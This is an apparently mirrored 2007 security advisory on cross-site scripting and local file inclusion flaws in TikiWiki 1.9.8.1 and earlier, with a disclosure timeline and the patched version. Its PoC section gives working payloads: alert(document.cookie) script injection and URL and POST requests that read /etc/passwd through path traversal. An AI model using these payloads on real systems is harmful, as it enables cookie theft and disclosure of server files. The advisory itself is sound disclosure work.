Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18292
HistoryOct 26, 2007 - 12:00 a.m.

TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion

2007-10-2600:00:00
vulners.com
38

======================================================================
TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion

Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Local File Inclusion
Status: patch available


Affected software description:

Application: TikiWiki
Version: <= 1.9.8.1
Vendor: http://tikiwiki.org

Description:
TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution.


Vulnerability:

XSS:

  1. The password reminder page is vulnerable to cross site scripting.

  2. Script code can be embedded into wiki-pages.

  3. The script db/tiki-db.php is vulnerable to cross site scripting

LFI:
4.
The script db/tiki-db.php is vulnerable to local file inclusion attacks.

The script tiki-imexport_languages.php is vulnerable to local file
inclusion attacks.


PoC/Exploit:

XSS:
1.
enter in the form: <img src="javascript:alert(document.cookie)">

URL: http://localhost/tikiwiki/tiki-remind_password.php
POSTDATA: username=%3Cimg+src%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3E
remind=send+me+my+password

create wiki page with:
{img src=javascript:alert(document.cookie) }

http://localhost/tikiwiki/tiki-index.php?local_php=&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

LFI:
4.
register_globals required:
http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd
http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd

feature lang_use_db(use database for translation) must be activated:
URL: http://localhost/tikiwiki/tiki-imexport_languages.php
POSTDATA: imp_language=…%2F…%2F…%2F…%2F…%2Fetc%2Fpasswd%00&import=import


Solution:

update to 1.9.8.2 or above:
https://sourceforge.net/project/showfiles.php?group_id=64258&amp;package_id=112134&amp;release_id=549549


Timeline:

23.10.2007 - vendor informed
25.10.2007 - vendor released patch
25.10.2007 - public disclosure